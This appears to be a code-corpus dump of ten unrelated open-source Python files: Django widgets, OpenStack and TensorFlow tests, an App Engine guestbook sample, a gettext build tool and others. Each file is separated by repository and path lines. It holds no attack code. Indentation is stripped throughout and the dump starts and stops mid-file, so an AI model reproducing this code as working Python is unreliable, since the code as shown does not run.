def decompress(self, value):
"""
Returns a list of decompressed values for the given compressed value.
The given value can be assumed to be valid, but not necessarily
non-empty.
"""
raise NotImplementedError('Subclasses must implement this method.')
def _get_media(self):
"Media for a multiwidget is the combination of all media of the subwidgets"
media = Media()
for w in self.widgets:
media = media + w.media
return media
media = property(_get_media)
def __deepcopy__(self, memo):
obj = super(MultiWidget, self).__deepcopy__(memo)
obj.widgets = copy.deepcopy(self.widgets)
return obj
@property
def needs_multipart_form(self):
return any(w.needs_multipart_form for w in self.widgets)
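# A minimal sketch (hypothetical widget, not part of Django) of how a subclass
# pairs its sub-widgets with decompress(); SplitDateTimeWidget below is the
# real in-tree example of the same pattern:
#
#     class SplitNameWidget(MultiWidget):
#         def __init__(self, attrs=None):
#             super(SplitNameWidget, self).__init__(
#                 (TextInput(attrs=attrs), TextInput(attrs=attrs)), attrs)
#         def decompress(self, value):
#             # "first last" -> ['first', 'last']; empty -> [None, None]
#             return value.split(' ', 1) if value else [None, None]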
class SplitDateTimeWidget(MultiWidget):
"""
A Widget that splits datetime input into two <input type="text"> boxes.
"""
supports_microseconds = False
def __init__(self, attrs=None, date_format=None, time_format=None):
widgets = (DateInput(attrs=attrs, format=date_format),
TimeInput(attrs=attrs, format=time_format))
super(SplitDateTimeWidget, self).__init__(widgets, attrs)
def decompress(self, value):
if value:
value = to_current_timezone(value)
return [value.date(), value.time().replace(microsecond=0)]
return [None, None]
class SplitHiddenDateTimeWidget(SplitDateTimeWidget):
"""
A Widget that splits datetime input into two <input type="hidden"> inputs.
"""
def __init__(self, attrs=None, date_format=None, time_format=None):
super(SplitHiddenDateTimeWidget, self).__init__(attrs, date_format, time_format)
for widget in self.widgets:
widget.input_type = 'hidden'
class SelectDateWidget(Widget):
"""
A Widget that splits date input into three <select> boxes.
This also serves as an example of a Widget that has more than one HTML
element and hence implements value_from_datadict.
"""
none_value = (0, '---')
month_field = '%s_month'
day_field = '%s_day'
year_field = '%s_year'
date_re = re.compile(r'(\d{4})-(\d\d?)-(\d\d?)$')
def __init__(self, attrs=None, years=None, months=None, empty_label=None):
self.attrs = attrs or {}
# Optional list or tuple of years to use in the "year" select box.
if years:
self.years = years
else:
this_year = datetime.date.today().year
self.years = range(this_year, this_year + 10)
# Optional dict of months to use in the "month" select box.
if months:
self.months = months
else:
self.months = MONTHS
# Optional string, list, or tuple to use as empty_label.
if isinstance(empty_label, (list, tuple)):
if not len(empty_label) == 3:
raise ValueError('empty_label list/tuple must have 3 elements.')
self.year_none_value = (0, empty_label[0])
self.month_none_value = (0, empty_label[1])
self.day_none_value = (0, empty_label[2])
else:
if empty_label is not None:
self.none_value = (0, empty_label)
self.year_none_value = self.none_value
self.month_none_value = self.none_value
self.day_none_value = self.none_value
@staticmethod
def _parse_date_fmt():
fmt = get_format('DATE_FORMAT')
escaped = False
for char in fmt:
if escaped:
escaped = False
elif char == '\\':
escaped = True
elif char in 'Yy':
yield 'year'
elif char in 'bEFMmNn':
yield 'month'
elif char in 'dj':
yield 'day'
def render(self, name, value, attrs=None):
try:
year_val, month_val, day_val = value.year, value.month, value.day
except AttributeError:
year_val = month_val = day_val = None
if isinstance(value, six.string_types):
if settings.USE_L10N:
try:
input_format = get_format('DATE_INPUT_FORMATS')[0]
v = datetime.datetime.strptime(force_str(value), input_format)
year_val, month_val, day_val = v.year, v.month, v.day
except ValueError:
pass
if year_val is None:
match = self.date_re.match(value)
if match:
year_val, month_val, day_val = [int(val) for val in match.groups()]
html = {}
choices = [(i, i) for i in self.years]
html['year'] = self.create_select(name, self.year_field, value, year_val, choices, self.year_none_value)
choices = list(self.months.items())
html['month'] = self.create_select(name, self.month_field, value, month_val, choices, self.month_none_value)
choices = [(i, i) for i in range(1, 32)]
html['day'] = self.create_select(name, self.day_field, value, day_val, choices, self.day_none_value)
output = []
for field in self._parse_date_fmt():
output.append(html[field])
return mark_safe('\n'.join(output))
def id_for_label(self, id_):
for first_select in self._parse_date_fmt():
return '%s_%s' % (id_, first_select)
else:
return '%s_month' % id_
def value_from_datadict(self, data, files, name):
y = data.get(self.year_field % name)
m = data.get(self.month_field % name)
d = data.get(self.day_field % name)
if y == m == d == "0":
return None
if y and m and d:
if settings.USE_L10N:
input_format = get_format('DATE_INPUT_FORMATS')[0]
try:
date_value = datetime.date(int(y), int(m), int(d))
except ValueError:
return '%s-%s-%s' % (y, m, d)
else:
date_value = datetime_safe.new_date(date_value)
return date_value.strftime(input_format)
else:
return '%s-%s-%s' % (y, m, d)
return data.get(name)
def create_select(self, name, field, value, val, choices, none_value):
if 'id' in self.attrs:
id_ = self.attrs['id']
else:
id_ = 'id_%s' % name
if not self.is_required:
choices.insert(0, none_value)
local_attrs = self.build_attrs(id=field % id_)
s = Select(choices=choices)
select_html = s.render(field % name, val, local_attrs)
return select_html
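# Usage sketch: SelectDateWidget(years=range(2012, 2017)).render('bday', datetime.date(2014, 3, 4))
# emits three <select> elements (year, month and day), ordered according to the
# locale's DATE_FORMAT as parsed by _parse_date_fmt().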
|
citrix-openstack-build/glance
|
refs/heads/master
|
glance/tests/functional/store/test_cinder.py
|
4
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack, LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Functional tests for the Cinder store interface
"""
import os
import oslo.config.cfg
import testtools
import glance.store.cinder as cinder
import glance.tests.functional.store as store_tests
import glance.tests.functional.store.test_swift as store_tests_swift
import glance.tests.utils
def parse_config(config):
out = {}
options = [
'test_cinder_store_auth_address',
'test_cinder_store_auth_version',
'test_cinder_store_tenant',
'test_cinder_store_user',
'test_cinder_store_key',
]
for option in options:
out[option] = config.defaults()[option]
return out
class TestCinderStore(store_tests.BaseTestCase, testtools.TestCase):
store_cls_path = 'glance.store.cinder.Store'
store_cls = glance.store.cinder.Store
store_name = 'cinder'
def setUp(self):
config_path = os.environ.get('GLANCE_TEST_CINDER_CONF')
if not config_path:
msg = "GLANCE_TEST_CINDER_CONF environ not set."
self.skipTest(msg)
oslo.config.cfg.CONF(args=[], default_config_files=[config_path])
raw_config = store_tests_swift.read_config(config_path)
try:
self.cinder_config = parse_config(raw_config)
ret = store_tests_swift.keystone_authenticate(
self.cinder_config['test_cinder_store_auth_address'],
self.cinder_config['test_cinder_store_auth_version'],
self.cinder_config['test_cinder_store_tenant'],
self.cinder_config['test_cinder_store_user'],
self.cinder_config['test_cinder_store_key'])
(tenant_id, auth_token, service_catalog) = ret
self.context = glance.context.RequestContext(
tenant=tenant_id,
service_catalog=service_catalog,
auth_tok=auth_token)
self.cinder_client = cinder.get_cinderclient(self.context)
except Exception as e:
msg = "Cinder backend isn't set up: %s" % e
self.skipTest(msg)
super(TestCinderStore, self).setUp()
def get_store(self, **kwargs):
store = cinder.Store(context=kwargs.get('context') or self.context)
store.configure()
store.configure_add()
return store
def stash_image(self, image_id, image_data):
# (zhiyan): The cinder store is currently a partial implementation;
# once Cinder exposes the 'brick' library and the 'host-volume-attaching'
# and 'multiple-attaching' enhancements are ready, the store will support
# the ADD/GET/DELETE interface.
raise NotImplementedError('stash_image cannot be implemented yet')
|
GoogleCloudPlatform/python-docs-samples
|
refs/heads/master
|
appengine/standard/ndb/overview/main.py
|
4
|
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Datastore NDB API guestbook sample.
This sample is used on this page:
https://cloud.google.com/appengine/docs/python/ndb/
For more information, see README.md
"""
# [START all]
import cgi
import textwrap
import urllib
from google.appengine.ext import ndb
import webapp2
# [START greeting]
class Greeting(ndb.Model):
"""Models an individual Guestbook entry with content and date."""
content = ndb.StringProperty()
date = ndb.DateTimeProperty(auto_now_add=True)
# [END greeting]
# [START query]
@classmethod
def query_book(cls, ancestor_key):
return cls.query(ancestor=ancestor_key).order(-cls.date)
class MainPage(webapp2.RequestHandler):
def get(self):
self.response.out.write('<html><body>')
guestbook_name = self.request.get('guestbook_name')
ancestor_key = ndb.Key("Book", guestbook_name or "*notitle*")
greetings = Greeting.query_book(ancestor_key).fetch(20)
# [END query]
greeting_blockquotes = []
for greeting in greetings:
greeting_blockquotes.append(
'<blockquote>%s</blockquote>' % cgi.escape(greeting.content))
self.response.out.write(textwrap.dedent("""\
<html>
<body>
{blockquotes}
<form action="/sign?{sign}" method="post">
<div>
<textarea name="content" rows="3" cols="60">
</textarea>
</div>
<div>
<input type="submit" value="Sign Guestbook">
</div>
</form>
<hr>
<form>
Guestbook name:
<input value="{guestbook_name}" name="guestbook_name">
<input type="submit" value="switch">
</form>
</body>
</html>""").format(
blockquotes='\n'.join(greeting_blockquotes),
sign=urllib.urlencode({'guestbook_name': guestbook_name}),
guestbook_name=cgi.escape(guestbook_name)))
# [START submit]
class SubmitForm(webapp2.RequestHandler):
def post(self):
# We set the parent key on each 'Greeting' to ensure each guestbook's
# greetings are in the same entity group.
guestbook_name = self.request.get('guestbook_name')
greeting = Greeting(parent=ndb.Key("Book",
guestbook_name or "*notitle*"),
content=self.request.get('content'))
greeting.put()
# [END submit]
self.redirect('/?' + urllib.urlencode(
{'guestbook_name': guestbook_name}))
app = webapp2.WSGIApplication([
('/', MainPage),
('/sign', SubmitForm)
])
# [END all]
|
albzan/attribra
|
refs/heads/master
|
site_scons/site_tools/gettexttool/__init__.py
|
22
|
""" This tool allows generation of gettext .mo compiled files, pot files from source code files
and pot files for merging.
Three new builders are added into the constructed environment:
- gettextMoFile: generates .mo file from .pot file using msgfmt.
- gettextPotFile: Generates .pot file from source code files.
- gettextMergePotFile: Creates a .pot file appropriate for merging into existing .po files.
To properly configure get text, define the following variables:
- gettext_package_bugs_address
- gettext_package_name
- gettext_package_version
"""
from SCons.Action import Action
def exists(env):
return True
XGETTEXT_COMMON_ARGS = (
"--msgid-bugs-address='$gettext_package_bugs_address' "
"--package-name='$gettext_package_name' "
"--package-version='$gettext_package_version' "
"-c -o $TARGET $SOURCES"
)
def generate(env):
env.SetDefault(gettext_package_bugs_address="example@example.com")
env.SetDefault(gettext_package_name="")
env.SetDefault(gettext_package_version="")
env['BUILDERS']['gettextMoFile']=env.Builder(
action=Action("msgfmt -o $TARGET $SOURCE", "Compiling translation $SOURCE"),
suffix=".mo",
src_suffix=".po"
)
env['BUILDERS']['gettextPotFile']=env.Builder(
action=Action("xgettext " + XGETTEXT_COMMON_ARGS, "Generating pot file $TARGET"),
suffix=".pot")
env['BUILDERS']['gettextMergePotFile']=env.Builder(
action=Action("xgettext " + "--omit-header --no-location " + XGETTEXT_COMMON_ARGS,
"Generating pot file $TARGET"),
suffix=".pot")
|
pv/scikit-learn
|
refs/heads/master
|
sklearn/tests/test_lda.py
|
77
|
import numpy as np
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.datasets import make_blobs
from sklearn import lda
# Data is just 6 separable points in the plane
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]], dtype='f')
y = np.array([1, 1, 1, 2, 2, 2])
y3 = np.array([1, 1, 2, 2, 3, 3])
# Degenerate data with only one feature (still should be separable)
X1 = np.array([[-2, ], [-1, ], [-1, ], [1, ], [1, ], [2, ]], dtype='f')
solver_shrinkage = [('svd', None), ('lsqr', None), ('eigen', None),
('lsqr', 'auto'), ('lsqr', 0), ('lsqr', 0.43),
('eigen', 'auto'), ('eigen', 0), ('eigen', 0.43)]
def test_lda_predict():
# Test LDA classification.
# This checks that LDA implements fit and predict and returns correct values
# for simple toy data.
for test_case in solver_shrinkage:
solver, shrinkage = test_case
clf = lda.LDA(solver=solver, shrinkage=shrinkage)
y_pred = clf.fit(X, y).predict(X)
assert_array_equal(y_pred, y, 'solver %s' % solver)
# Assert that it works with 1D data
y_pred1 = clf.fit(X1, y).predict(X1)
assert_array_equal(y_pred1, y, 'solver %s' % solver)
# Test probability estimates
y_proba_pred1 = clf.predict_proba(X1)
assert_array_equal((y_proba_pred1[:, 1] > 0.5) + 1, y,
'solver %s' % solver)
y_log_proba_pred1 = clf.predict_log_proba(X1)
assert_array_almost_equal(np.exp(y_log_proba_pred1), y_proba_pred1,
8, 'solver %s' % solver)
# Primarily test for commit 2f34950 -- "reuse" of priors
y_pred3 = clf.fit(X, y3).predict(X)
# LDA shouldn't be able to separate those
assert_true(np.any(y_pred3 != y3), 'solver %s' % solver)
# Test invalid shrinkages
clf = lda.LDA(solver="lsqr", shrinkage=-0.2231)
assert_raises(ValueError, clf.fit, X, y)
clf = lda.LDA(solver="eigen", shrinkage="dummy")
assert_raises(ValueError, clf.fit, X, y)
clf = lda.LDA(solver="svd", shrinkage="auto")
assert_raises(NotImplementedError, clf.fit, X, y)
# Test unknown solver
clf = lda.LDA(solver="dummy")
assert_raises(ValueError, clf.fit, X, y)
def test_lda_coefs():
# Test if the coefficients of the solvers are approximately the same.
n_features = 2
n_classes = 2
n_samples = 1000
X, y = make_blobs(n_samples=n_samples, n_features=n_features,
centers=n_classes, random_state=11)
clf_lda_svd = lda.LDA(solver="svd")
clf_lda_lsqr = lda.LDA(solver="lsqr")
clf_lda_eigen = lda.LDA(solver="eigen")
clf_lda_svd.fit(X, y)
clf_lda_lsqr.fit(X, y)
clf_lda_eigen.fit(X, y)
assert_array_almost_equal(clf_lda_svd.coef_, clf_lda_lsqr.coef_, 1)
assert_array_almost_equal(clf_lda_svd.coef_, clf_lda_eigen.coef_, 1)
assert_array_almost_equal(clf_lda_eigen.coef_, clf_lda_lsqr.coef_, 1)
def test_lda_transform():
# Test LDA transform.
clf = lda.LDA(solver="svd", n_components=1)
X_transformed = clf.fit(X, y).transform(X)
assert_equal(X_transformed.shape[1], 1)
clf = lda.LDA(solver="eigen", n_components=1)
X_transformed = clf.fit(X, y).transform(X)
assert_equal(X_transformed.shape[1], 1)
clf = lda.LDA(solver="lsqr", n_components=1)
clf.fit(X, y)
msg = "transform not implemented for 'lsqr'"
assert_raise_message(NotImplementedError, msg, clf.transform, X)
def test_lda_orthogonality():
# arrange four classes with their means in a kite-shaped pattern
# the longer distance should be transformed to the first component, and
# the shorter distance to the second component.
means = np.array([[0, 0, -1], [0, 2, 0], [0, -2, 0], [0, 0, 5]])
# We construct perfectly symmetric distributions, so the LDA can estimate
# precise means.
scatter = np.array([[0.1, 0, 0], [-0.1, 0, 0], [0, 0.1, 0], [0, -0.1, 0],
[0, 0, 0.1], [0, 0, -0.1]])
X = (means[:, np.newaxis, :] + scatter[np.newaxis, :, :]).reshape((-1, 3))
y = np.repeat(np.arange(means.shape[0]), scatter.shape[0])
# Fit LDA and transform the means
clf = lda.LDA(solver="svd").fit(X, y)
means_transformed = clf.transform(means)
d1 = means_transformed[3] - means_transformed[0]
d2 = means_transformed[2] - means_transformed[1]
d1 /= np.sqrt(np.sum(d1 ** 2))
d2 /= np.sqrt(np.sum(d2 ** 2))
# the transformed within-class covariance should be the identity matrix
assert_almost_equal(np.cov(clf.transform(scatter).T), np.eye(2))
# the means of classes 0 and 3 should lie on the first component
assert_almost_equal(np.abs(np.dot(d1[:2], [1, 0])), 1.0)
# the means of classes 1 and 2 should lie on the second component
assert_almost_equal(np.abs(np.dot(d2[:2], [0, 1])), 1.0)
def test_lda_scaling():
# Test if classification works correctly with differently scaled features.
n = 100
rng = np.random.RandomState(1234)
# use uniform distribution of features to make sure there is absolutely no
# overlap between classes.
x1 = rng.uniform(-1, 1, (n, 3)) + [-10, 0, 0]
x2 = rng.uniform(-1, 1, (n, 3)) + [10, 0, 0]
x = np.vstack((x1, x2)) * [1, 100, 10000]
y = [-1] * n + [1] * n
for solver in ('svd', 'lsqr', 'eigen'):
clf = lda.LDA(solver=solver)
# should be able to separate the data perfectly
assert_equal(clf.fit(x, y).score(x, y), 1.0,
'using covariance: %s' % solver)
def test_covariance():
x, y = make_blobs(n_samples=100, n_features=5,
centers=1, random_state=42)
# make features correlated
x = np.dot(x, np.arange(x.shape[1] ** 2).reshape(x.shape[1], x.shape[1]))
c_e = lda._cov(x, 'empirical')
assert_almost_equal(c_e, c_e.T)
c_s = lda._cov(x, 'auto')
assert_almost_equal(c_s, c_s.T)
|
s-t-e-a-l-t-h/Eclipsing-binaries-library
|
refs/heads/master
|
objects/SelfTest.py
|
1
|
#!/usr/bin/python
""" SelfTest trieda
-------------------
Trieda na vnutorne testovanie funkcii celeho balika
Inicializacne parametre:
------------------------
Staticka trieda, ziadne inicializacne parametre
Metody a strucny popis (blizsi popis funkcnosti v komentaroch k jednotlivym riadkom kodu v funkciach):
------------------------------------------------------------------------------------------------------
init_binary_mass_test()
=======================
Vstupne parametre:
------------------
rand_values : [integer], defaultna hodnota "100", premenna urcujuca pocet testov, pocet dvojic hmotnosti pre system
potential : [float], defaultna hodnota "100", premenna definujuca potencial pre obe zlozky pouzite vo vsetkych
testoch
min_mass : [float], defaultna hodnota "0.2", minimalna hmotnost, ktora sa nahodne generuje
max_mass : [float], defaultna hodnota "0.2", maximalna hmotnost, ktora sa nahodne generuje
Return:
-------
void
Popis:
------
funkcia vygeneruje rand_values dvojic hmotnosti a a snazi sa pri zadanom potential vygenerovat binarny system
v pripade poruchy vypise problem
Bug:
----
ziaden znamy bug
lagrangian_points_test()
========================
Vstupne parametre:
------------------
rand_values : [integer], defaultna hodnota "100", premenna urcujuca pocet testov, pocet dvojic hmotnosti pre system
potential : [float], defaultna hodnota "100", premenna definujuca potencial pre obe zlozky pouzite vo vsetkych
testoch
min_mass : [float], defaultna hodnota "0.2", minimalna hmotnost, ktora sa nahodne generuje
max_mass : [float], defaultna hodnota "0.2", maximalna hmotnost, ktora sa nahodne generuje
Return:
-------
void
Popis:
------
funkcia vygeneruje rand_values dvojic hmotnosti a a snazi sa pri zadanom potential spocitat lagrangeove body
Bug:
----
ziaden znamy bug
"""
import objects.Star as Star
import objects.Binary as Binary
# import globe.variables as gv
# import objects.Plot as Plt
import objects.Function as Fn
# import objects.Geometry as Geo
# import sys
# import numpy as np
import time as time
def init_binary_mass_test(rand_values=100, potential=100, min_mass=0.2, max_mass=20):
start_time = time.time()
random_primary_mass = Fn.rand(min_mass, max_mass, rand_values, time.time())
random_secondary_mass = Fn.rand(min_mass, max_mass, rand_values, random_primary_mass[0])
stars_combination = []
for pm, sm in list(zip(random_primary_mass, random_secondary_mass)):
stars_combination.append([
Star.Star(mass=pm, synchronicity_parameter=1., potential=potential, effective_temperature=5000.,
gravity_darkening=1., metallicity=0., albedo=0.),
Star.Star(mass=sm, synchronicity_parameter=1., potential=potential, effective_temperature=5000.,
gravity_darkening=1., metallicity=0., albedo=0.),
])
for system in stars_combination:
bin_sys = Binary.Binary(primary=system[0], secondary=system[1], system="eb", verbose=True)
if not bin_sys.init:
print("Problem in binary system with parameters:")
print("primary mass:\t\t" + str(bin_sys.primary.mass))
print(" potential:\t\t" + str(bin_sys.primary.potential))
print("secondary mass:\t\t" + str(bin_sys.secondary.mass))
print(" potential:\t\t" + str(bin_sys.secondary.potential))
# this test function uses the same potential for both components, so it is enough to print a single filling_factor
print("Filling factor:\t\t" + str(bin_sys.primary.filling_factor))
print("Inner potential:\t" + str(bin_sys.potential_inner))
print("Outer potential:\t" + str(bin_sys.potential_outer))
print("Potential dif:\t\t" + str(bin_sys.df_potential))
print("Critical:\t\t" + str(bin_sys.primary.critical_potential))
print("_________________________________________")
print("")
### values for which an error once occurred on the primary polar radius and never showed up again
### primary.potential = secondary.potential = 20.0
### primary.mass = 1.00116324935
### secondary.mass = 4.24889197062
end_time = time.time()
print("init_binary_mass_test() finished, elapsed time:" + str(round(end_time - start_time, 5)) + "sec")
def lagrangian_points_test(rand_values=100, potential=100, min_mass=0.2, max_mass=20):
# this function is only a redundant cross-check; in practice these cases are already filtered out during
# initialization of the Binary class, where the critical-point computation is wrapped in a try/except block,
# so if an error occurs there, the init variable is set to False and the system is never tested here
start_time = time.time()
random_primary_mass = Fn.rand(min_mass, max_mass, rand_values, time.time())
random_secondary_mass = Fn.rand(min_mass, max_mass, rand_values, random_primary_mass[0])
stars_combination = []
for pm, sm in list(zip(random_primary_mass, random_secondary_mass)):
stars_combination.append([
Star.Star(mass=pm, synchronicity_parameter=1., potential=potential, effective_temperature=5000.,
gravity_darkening=1., metallicity=0., albedo=0.),
Star.Star(mass=sm, synchronicity_parameter=1., potential=potential, effective_temperature=5000.,
gravity_darkening=1., metallicity=0., albedo=0.),
])
for system in stars_combination:
# verbose is turned off here because, if it were on, it would apply to everything in the Binary class,
# including the polar radius computation, which would then print an error; at this point we do not care
# that the system's quantities are unphysical, such a system is simply discarded based on init
bin_sys = Binary.Binary(primary=system[0], secondary=system[1], system="eb", verbose=False)
if bin_sys.init:
# switch verbose on so that error messages start being printed
bin_sys.verbose = True
lp = bin_sys.get_lagrangian_points(actual_distance=1.0, t_object="secondary")
# after the computation it must be turned off again, because a new system will be created
bin_sys.verbose = False
# if there are fewer than 3 Lagrangian points in the list, something went wrong and it is reported
if len(lp) != 3:
print("Lagrangian points")
print("Problem in binary system with parameters:")
print("primary mass:\t\t" + str(bin_sys.primary.mass))
print(" potential:\t\t" + str(bin_sys.primary.potential))
print("secondary mass:\t\t" + str(bin_sys.secondary.mass))
print(" potential:\t\t" + str(bin_sys.secondary.potential))
print("_________________________________________")
print("")
end_time = time.time()
print("lagrangian_points_test() finished, elapsed time:" + str(round(end_time - start_time, 5)) + "sec")
|
seksan2538/schedule-generator
|
refs/heads/master
|
mechanize/_sockettimeout.py
|
149
|
import socket
try:
_GLOBAL_DEFAULT_TIMEOUT = socket._GLOBAL_DEFAULT_TIMEOUT
except AttributeError:
_GLOBAL_DEFAULT_TIMEOUT = object()
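# Usage sketch: callers take the sentinel as a default argument so they can
# tell "no timeout supplied" apart from an explicit None (blocking mode), e.g.:
#
#     def urlopen(url, timeout=_GLOBAL_DEFAULT_TIMEOUT):
#         if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
#             sock.settimeout(timeout)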
|
ralph-mikera/RouteFlow-1
|
refs/heads/master
|
pox/pox/lib/recoco/examples.py
|
26
|
# Copyright 2011 Colin Scott
# Copyright 2011 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
These are example uses of the recoco cooperative threading library. Hopefully
they will save time for developers getting used to the POX environment.
"""
from pox.core import core
import pox.core  # needed so the pox.core.GoingUpEvent reference below resolves
import pox.openflow.libopenflow_01 as of
from pox.lib.revent import *
from pox.lib.recoco import *
class EventLoopExample (Task):
"""
Suppose we have a component of our application that uses its own event
loop. recoco allows us to "add" our select loop to the other event
loops running within pox.
First note that we inherit from Task. The Task class is recoco's equivalent
of python's threading.Thread interface.
"""
def __init__(self):
Task.__init__(self) # call our superconstructor
self.sockets = self.get_sockets() # ... the sockets to listen to events on
# Note! We can't start our event loop until the core is up. Therefore,
# we'll add an event handler.
core.addListener(pox.core.GoingUpEvent, self.start_event_loop)
def start_event_loop(self, event):
"""
Takes a second parameter: the GoingUpEvent object (which we ignore)
"""
# This causes us to be added to the scheduler's recurring Task queue
Task.start(self)
def get_sockets(self):
return []
def handle_read_events(self):
pass
def run(self):
"""
run() is the method that gets called by the scheduler to execute this task
"""
while core.running:
"""
This looks almost exactly like python's select.select, except that
it's handled cooperatively by recoco.
The only differences in syntax are the "yield" statement, and the
capital S on "Select".
"""
rlist,wlist,elist = yield Select(self.sockets, [], [], 3)
events = []
for read_sock in rlist:
if read_sock in self.sockets:
events.append(read_sock)
if events:
self.handle_read_events() # ...
"""
And that's it!
TODO: write example usages of the other recoco BlockingTasks, e.g. recoco.Sleep
"""
|
CingHu/neutron-ustack
|
refs/heads/master
|
neutron/tests/unit/plumgrid/extensions/test_securitygroups.py
|
12
|
# Copyright 2014 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
PLUMgrid plugin security group extension unit tests
"""
import mock
from neutron.openstack.common import importutils
from neutron.plugins.plumgrid.plumgrid_plugin import plumgrid_plugin
from neutron.tests.unit import test_extension_security_group as ext_sg
PLUM_DRIVER = ('neutron.plugins.plumgrid.drivers.fake_plumlib.Plumlib')
FAKE_DIRECTOR = '1.1.1.1'
FAKE_PORT = '1234'
FAKE_USERNAME = 'fake_admin'
FAKE_PASSWORD = 'fake_password'
FAKE_TIMEOUT = '0'
class SecurityGroupsTestCase(ext_sg.SecurityGroupDBTestCase):
_plugin_name = ('neutron.plugins.plumgrid.plumgrid_plugin.'
'plumgrid_plugin.NeutronPluginPLUMgridV2')
def setUp(self):
def mocked_plumlib_init(self):
director_plumgrid = FAKE_DIRECTOR
director_port = FAKE_PORT
director_username = FAKE_USERNAME
director_password = FAKE_PASSWORD
timeout = FAKE_TIMEOUT
self._plumlib = importutils.import_object(PLUM_DRIVER)
self._plumlib.director_conn(director_plumgrid,
director_port, timeout,
director_username,
director_password)
with mock.patch.object(plumgrid_plugin.NeutronPluginPLUMgridV2,
'plumgrid_init', new=mocked_plumlib_init):
super(SecurityGroupsTestCase, self).setUp(self._plugin_name)
def tearDown(self):
super(SecurityGroupsTestCase, self).tearDown()
class TestSecurityGroups(ext_sg.TestSecurityGroups, SecurityGroupsTestCase):
pass
class TestSecurityGroupsXML(TestSecurityGroups):
fmt = 'xml'
|
zasdfgbnm/tensorflow
|
refs/heads/master
|
tensorflow/python/kernel_tests/gather_nd_op_test.py
|
18
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.gather_nd."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class GatherNdTest(test.TestCase):
def _testSimpleDtype(self, dtype):
with self.test_session(use_gpu=True):
params = constant_op.constant(np.array([8, 1, 2, 3, 7, 5], dtype=dtype))
indices = constant_op.constant([[4], [4], [0]])
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
self.assertAllEqual(np.array([7, 7, 8], dtype=dtype), gather_nd_val)
self.assertEqual([3], gather_nd_t.get_shape())
def testSimpleDtype(self):
self._testSimpleDtype(np.float32)
self._testSimpleDtype(np.float64)
self._testSimpleDtype(np.int32)
self._testSimpleDtype(np.int64)
self._testSimpleDtype(np.complex64)
self._testSimpleDtype(np.complex128)
self._testSimpleDtype("|S") # byte strings in python2 + 3
def testEmptyIndicesAndParamsOKButJustEmptyParamsFails(self):
with self.test_session(use_gpu=True):
params = np.ones((3, 3), dtype=np.float32)
indices_empty = np.empty((0, 2), dtype=np.int32)
gather_nd_ok_t = array_ops.gather_nd(params, indices_empty)
gather_nd_ok_val = gather_nd_ok_t.eval()
self.assertEqual([0], gather_nd_ok_t.get_shape())
self.assertAllClose(np.empty((0,), dtype=np.float32), gather_nd_ok_val)
indices_empty = np.empty((0, 1), dtype=np.int32)
gather_nd_ok_t = array_ops.gather_nd(params, indices_empty)
gather_nd_ok_val = gather_nd_ok_t.eval()
self.assertEqual([0, 3], gather_nd_ok_t.get_shape())
self.assertAllClose(np.empty((0, 3), dtype=np.float32), gather_nd_ok_val)
params_empty = np.empty((0, 3), dtype=np.float32)
indices_empty = np.empty((0, 2), dtype=np.int32)
gather_nd_ok_t = array_ops.gather_nd(params_empty, indices_empty)
gather_nd_ok_val = gather_nd_ok_t.eval()
self.assertEqual([0], gather_nd_ok_t.get_shape())
self.assertAllClose(np.empty((0,), dtype=np.float32), gather_nd_ok_val)
params_empty = np.empty((0, 3), dtype=np.float32)
indices_nonempty = np.zeros((1, 2), dtype=np.int32)
gather_nd_break_t = array_ops.gather_nd(params_empty, indices_nonempty)
